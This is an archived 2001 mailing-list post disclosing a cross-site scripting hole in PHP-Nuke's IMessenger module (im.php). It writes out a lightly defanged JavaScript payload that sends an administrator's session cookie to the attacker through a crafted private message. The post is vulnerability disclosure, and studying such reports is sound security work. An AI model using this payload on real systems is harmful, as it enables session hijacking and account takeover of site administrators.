Vulnerability Development mailing list archives
Security hole in IMessenger ( PHP-Nuke )
From: frog frog <leseulfrog () hotmail com>
Date: 15 Dec 2001 13:45:29 -0000
There is a big hole in imessenger (im.php). He accept javascript... if I send <*s*cript>window.location.href='http://www. [SERVER].com/im.php?username_to= [MY_NICK] &subject='+ document.cookie +'&message=message&action=send' ;</script> (without '*') to the admin, he send his cookie. PHPNuke has been alerted. There's a tut (french) here : http://balteam.multimania.com/Tuts/imhole.txt frog-m@n
Current thread:
- Security hole in IMessenger ( PHP-Nuke ) frog frog (Dec 15)